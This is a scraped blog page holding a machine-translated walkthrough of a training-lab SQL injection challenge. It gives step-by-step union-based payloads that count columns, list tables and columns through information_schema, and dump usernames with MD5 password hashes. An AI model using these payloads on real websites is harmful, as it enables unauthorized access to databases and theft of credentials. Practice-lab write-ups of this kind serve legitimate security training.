当前位置:网站首页>Mozi college SQL injection solution
Mozi college SQL injection solution
2020-11-08 09:40:00 【osc_7bgz0no1】
One · Judgment injection
Input id=1, Normal return . Input id=-1 Returns an error . from This shows that there is injection .
Two · Judgment fields
URL id=-1 order by 1
URL id=-1 order by 2
URL id=-1 order by 3
URL id=-1 order by 4
URL id=-1 order by 5 An error at this time , The description has four fields
3、 ... and · Use union Query injection point
Input union select 1,2,3,4
Find out 2,3 For the obvious note point
Four · Use database() Chaku name
Input union select 1,database(),3,4
Find out the name of the library mozhe_Discuz_StormGroup
5、 ... and · Look up the name of the table
Input
union select 1,group_concat(table_name),3,4 from information_schema.tables where table_schema=‘mozhe_Discuz_StormGroup’
Query to StormGroup_member,notice
See member, So doubt about the first one . So first look up the first .
6、 ... and · Inquire about StormGroup_member The fields stored in the
Input
union select 1,group_concat(column_name)3,4 from information_schema.columns where table_name=‘StormGroup_member’
Query out id,name,password,status
7、 ... and · Query password and user name
union select 1,group_concat(name,0x3a,password),3,4 from StormGroup_member
obtain md5 Encrypted value . To decrypt , Get the code .
If the password is wrong , adopt limit m,n To continue with the inquiry .
8、 ... and · Submit key
After getting the password, you can see key, Copy , Submit .
版权声明
本文为[osc_7bgz0no1]所创,转载请带上原文链接,感谢
边栏推荐
- PX4添加新的应用
- Astra: Apache Cassandra的未来是云原生
- Basic concepts of computer network (5) basic principles of local area network
- Cloud Alibabab笔记问世,全网详解仅此一份手慢无
- Japan PSE certification
- 将“光头”识别为“足球”,AI 摄像头如何犯的错?
- ArrayList源码分析
- Oschina plays on Sunday - before that, I always thought I was a
- Rust: command line parameter and environment variable operation
- PerconaXtraDBCluster8.0 最详尽用法指南
猜你喜欢

Astra: Apache Cassandra的未来是云原生

Python loop distinction (while loop and for loop)

Deeplight Technology Bluetooth protocol SRRC certification services

Function periodic table filter value selectedvalue

Can you do it with only six characters?

FORTRAN77从文件中读入若干数据并用heron迭代公式开方

成功解决An error ocurred while starting the kernel

Visual studio 2015 unresponsive / stopped working problem resolution

Improvement of rate limit for laravel8 update

scala 中 Future 的简单使用
随机推荐
Littlest jupyterhub| 02 using nbgitpuller to distribute shared files
Deeplight Technology Bluetooth protocol SRRC certification services
Astra: the future of Apache Cassandra is cloud native
狗狗也能操作无人机!你没看错,不过这其实是架自动驾驶无人机 - 知乎
Px4 adds new applications
IOS learning note 2 [problems and solutions encountered during the installation and use of cocopods] [update 20160725]
Rust: command line parameter and environment variable operation
Windows subsystem Ubuntu installation
Improvement of rate limit for laravel8 update
Littlest JupyterHub| 02 使用nbgitpuller分发共享文件
技术人员该如何接手一个复杂的系统?
Which is more worth starting with the difference between vivos7e and vivos7
Unparseable date: 'Mon Aug 15 11:24:39 CST 2016',时间格式转换异常
How does spotify drive data-driven decision making?
Bili Bili common API
Cloud Alibabab笔记问世,全网详解仅此一份手慢无
分布式共识机制
Recommend an economic science video, very valuable!
搜索引擎的日常挑战_4_外部异构资源 - 知乎
Spotify是如何推动数据驱动决策的?